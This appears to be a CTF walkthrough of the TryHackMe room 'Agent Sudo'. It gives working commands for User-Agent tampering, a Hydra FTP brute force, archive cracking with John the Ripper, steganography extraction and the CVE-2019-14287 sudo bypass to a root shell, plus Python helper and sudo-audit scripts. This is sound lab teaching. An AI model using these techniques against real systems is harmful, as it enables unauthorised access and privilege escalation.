Papadope Course

Agent Sudo - TryHackMe Walkthrough


A beginner-friendly boot2root machine featuring User-Agent header tampering, FTP brute forcing, steganography, password cracking, and privilege escalation via a sudo bypass.

Room URL: https://tryhackme.com/room/agentsudoctf

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • curl (custom User-Agent)
  • Hydra (FTP brute force)
  • FTP
  • binwalk / 7z (extract hidden data)
  • steghide (steganography)
  • zip2john + John the Ripper
  • base64 decoding
  • SSH
  • sudo misconfiguration (CVE-2019-14287)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port   Service   Notes
21     FTP       Credentials required
22     SSH       OpenSSH
80     HTTP      Apache web server

2. Web Enumeration (User-Agent)

Browse to http://<TARGET_IP>/.

The landing page suggests the site responds differently depending on the User-Agent header. Since it mentions multiple agents, cycle through candidate User-Agent values (e.g., single letters) until one of them unlocks additional content.

Example using curl:

curl -A "C" http://<TARGET_IP>/

When the correct User-Agent is used (commonly Agent C), you should be redirected to an “agent C attention” page.

From the hint, identify a username (commonly chris).
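The curl loop above can be automated so that every candidate User-Agent is compared against a generic browser baseline and only the ones that produce a different response are reported. The script below is an added example for this walkthrough, not code from the original post or the room; the candidate list (A..Z), the baseline string and the offline stand-in server are constructed assumptions, and a real URL can be passed as the first argument.

```python
"""Probe how a page responds to different User-Agent values and report the
ones that yield a different response than a generic browser baseline.
Added example for this walkthrough; not part of the original post or the room."""
import hashlib
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

# Constructed candidate list: the room hints at lettered agents, so try A..Z.
CANDIDATE_AGENTS = [chr(c) for c in range(ord("A"), ord("Z") + 1)]
BASELINE_AGENT = "Mozilla/5.0 (generic baseline)"

Fetcher = Callable[[str], Tuple[int, bytes]]


def _fingerprint(status: int, body: bytes) -> str:
    """Compact identity of a response: status code plus a body hash."""
    return f"{status}:{hashlib.sha256(body).hexdigest()[:16]}"


def find_agent_variants(fetch: Fetcher,
                        agents: Iterable[str] = CANDIDATE_AGENTS,
                        baseline_agent: str = BASELINE_AGENT) -> Dict[str, str]:
    """Return {agent: fingerprint} for agents whose response differs from the baseline."""
    baseline = _fingerprint(*fetch(baseline_agent))
    variants: Dict[str, str] = {}
    for agent in agents:
        fp = _fingerprint(*fetch(agent))
        if fp != baseline:
            variants[agent] = fp
    return variants


def make_http_fetcher(url: str, timeout: float = 5.0) -> Fetcher:
    """Real fetcher using the standard library; follows redirects like curl -L would,
    so a redirect to an 'attention' page shows up as a different body."""
    def fetch(agent: str) -> Tuple[int, bytes]:
        req = urllib.request.Request(url, headers={"User-Agent": agent})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch


def fake_fetch(agent: str) -> Tuple[int, bytes]:
    """Constructed stand-in for the room's web server so the script runs offline:
    only the agent "C" receives a different page."""
    if agent == "C":
        return 200, b"<html>attention page for agent C (constructed)</html>"
    return 200, b"<html>generic landing page (constructed)</html>"


if __name__ == "__main__":
    fetcher = make_http_fetcher(sys.argv[1]) if len(sys.argv) > 1 else fake_fetch
    for agent, fp in find_agent_variants(fetcher).items():
        print(f"User-Agent {agent!r} -> different response ({fp})")
```

Comparing a hash of the body rather than the status code alone matters here: the server may answer 200 to every agent and still serve different content, which is exactly the kind of header-keyed gating the room demonstrates and why a User-Agent check is not access control.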


3. FTP Access (Brute Force)

Brute force FTP for the discovered user:

hydra -l chris -P /usr/share/wordlists/SecLists/Passwords/500-worst-passwords.txt ftp://<TARGET_IP>

Log in and download the available files:

ftp <TARGET_IP>
# Username: chris
# Password: <CRACKED_PASSWORD>

# Then:
# get <files>

You should retrieve:

  • A text note (agent hint)
  • An image likely containing hidden data
  • A second image/archive container

4. Hidden Data (Archive + Stego)

Extract hidden archive from the image

Try extracting embedded data:

binwalk -e <IMAGE_FILE>

If you find a zip file, crack it:

zip2john <ZIP_FILE> > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash

Unzip with the recovered password:

7z x <ZIP_FILE>

One of the extracted notes typically includes a base64 string that decodes to the passphrase for the stego image.

Decode it:

echo "<BASE64_STRING>" | base64 -d
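To see what binwalk is doing in the step above, the following script locates a ZIP archive appended to an image by its local file header signature, carves it out, and lists the entries together with the flag that tells you whether the archive is password-protected (the case where zip2john and john are needed). It is an added example for this walkthrough, not code from the original post or the room; the sample image and the entry name note.txt are constructed placeholders, and a real file can be passed as the first argument.

```python
"""Locate a ZIP archive appended to an image, carve it out, and list its
entries together with whether each is password-protected.
Added example for this walkthrough; not part of the original post or the room."""
import io
import sys
import zipfile
from typing import Dict, List

ZIP_LOCAL_HEADER = b"PK\x03\x04"      # local file header signature
ZIP_CENTRAL_HEADER = b"PK\x01\x02"    # central directory header signature


def find_embedded_zip_offsets(blob: bytes) -> List[int]:
    """Offsets of every local file header signature in the blob.
    The first one is where an appended archive begins."""
    offsets, pos = [], 0
    while (pos := blob.find(ZIP_LOCAL_HEADER, pos)) != -1:
        offsets.append(pos)
        pos += len(ZIP_LOCAL_HEADER)
    return offsets


def carve_zip(blob: bytes) -> bytes:
    """Return the bytes from the first local header to the end of the blob."""
    offsets = find_embedded_zip_offsets(blob)
    if not offsets:
        raise ValueError("no ZIP local file header found")
    return blob[offsets[0]:]


def describe_zip(zip_bytes: bytes) -> List[Dict[str, object]]:
    """List the archive's entries; bit 0 of the general-purpose flag marks
    encryption, which is what makes the zip2john + john step necessary."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [{"name": zi.filename,
                 "size": zi.file_size,
                 "encrypted": bool(zi.flag_bits & 0x1)}
                for zi in zf.infolist()]


def build_sample_image(encrypted_flag: bool) -> bytes:
    """Constructed test input: a minimal JPEG-like byte sequence with a
    one-entry ZIP appended after the EOI marker. note.txt is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("note.txt", "placeholder note\n")
    archive = bytearray(buf.getvalue())
    if encrypted_flag:
        # zipfile cannot write encrypted archives, so set the encryption bit by
        # hand: offset 6 in the local header, offset 8 in the central directory.
        archive[archive.find(ZIP_LOCAL_HEADER) + 6] |= 0x1
        archive[archive.find(ZIP_CENTRAL_HEADER) + 8] |= 0x1
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"  # SOI, APP0 stub, EOI
    return fake_jpeg + bytes(archive)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_image(True)
    for off in find_embedded_zip_offsets(data):
        print(f"ZIP local header at offset {off}")
    for entry in describe_zip(carve_zip(data)):
        print(entry)
```

The carve is deliberately naive (everything from the first `PK\x03\x04` to the end of the file) because that is the common appended-archive case; an archive embedded in the middle of a container would need the central directory offsets to decide where it ends.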

Extract the stego content

Use the decoded passphrase with steghide:

steghide extract -sf <STEGO_IMAGE>
# Enter passphrase when prompted

This should reveal SSH credentials for a user (commonly james).


5. SSH Login

SSH in with the discovered credentials:

ssh james@<TARGET_IP>

Collect the user flag in user.txt.


6. Privilege Escalation (sudo bypass)

Check sudo rights:

sudo -l

A common misconfiguration for this room is a rule that allows running commands as any user except root, which is vulnerable to CVE-2019-14287.

Exploit it by specifying user ID -1:

sudo -u#-1 /bin/bash

You should now have a root shell.

Collect the root flag in /root/root.txt.
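From the defender's side, the rule that makes this escalation work can be found by auditing sudo -l output for runas specifications that grant "everyone except root" and checking the installed sudo version against the fix release. The script below is an added example for this walkthrough, not code from the original post or the room; the sample sudo -l output is constructed (hostname "target"), and it assumes sudo 1.8.28 as the version that fixed CVE-2019-14287.

```python
"""Audit sudo -l output for runas specifications that grant "any user except
root" (the pattern behind CVE-2019-14287) and check whether the installed
sudo is old enough to be affected. Added example for this walkthrough; not
part of the original post or the room."""
import re
import subprocess
from typing import List, Tuple

# Constructed sudo -l output in the shape the walkthrough describes.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on target:
    env_reset, mail_badpass

User james may run the following commands on target:
    (ALL, !root) /bin/bash
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<cmd>\S.*)$")
FIXED_VERSION = (1, 8, 28)  # assumption: CVE-2019-14287 was fixed in sudo 1.8.28


def parse_sudo_l(output: str) -> List[Tuple[str, str]]:
    """Extract (runas spec, command) pairs from sudo -l output."""
    return [(m.group("runas").strip(), m.group("cmd").strip())
            for m in map(RULE_RE.match, output.splitlines()) if m]


def rule_excludes_root_only(runas: str) -> bool:
    """True when the user part is ALL with root removed by negation
    (e.g. "ALL, !root"). root is then excluded only by name, which is
    exactly what the -u#-1 bypass in the walkthrough gets around."""
    users = runas.split(":", 1)[0]  # drop the optional ":group" part
    tokens = [t.strip() for t in users.split(",") if t.strip()]
    return "ALL" in tokens and "!root" in tokens


def parse_sudo_version(version_output: str) -> Tuple[int, int, int]:
    """Turn 'Sudo version 1.8.21p2' into (1, 8, 21)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("no version number found")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def sudo_is_fixed(version_output: str) -> bool:
    return parse_sudo_version(version_output) >= FIXED_VERSION


def audit(sudo_l_output: str, version_output: str) -> List[str]:
    """Human-readable findings for the given sudo -l and sudo --version output."""
    findings = []
    fixed = sudo_is_fixed(version_output)
    for runas, cmd in parse_sudo_l(sudo_l_output):
        if rule_excludes_root_only(runas):
            state = ("mitigated by sudo version" if fixed
                     else "affected (sudo older than 1.8.28)")
            findings.append(f"({runas}) {cmd}: root excluded only by name -> {state}")
    return findings


if __name__ == "__main__":
    # Run against the live system when sudo is available and non-interactive,
    # otherwise fall back to the constructed sample.
    try:
        sudo_l = subprocess.run(["sudo", "-n", "-l"], capture_output=True,
                                text=True, check=True).stdout
        version = subprocess.run(["sudo", "--version"], capture_output=True,
                                 text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        sudo_l, version = SAMPLE_SUDO_L, "Sudo version 1.8.21p2"
    for line in audit(sudo_l, version) or ["no root-exclusion rules found"]:
        print(line)
```

Even on a patched sudo, a rule of the form (ALL, !root) deserves a second look: it grants impersonation of every other account on the box, so the least-privilege fix is to list the specific target user(s) the command actually needs rather than to rely on a negation.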


Notes

  • Redact any real passwords/flags if publishing publicly.
  • The key learning points are:
    • Header-based access control (User-Agent)
    • Chained enumeration (web -> FTP -> stego -> SSH)
    • sudo policy weaknesses and why they matter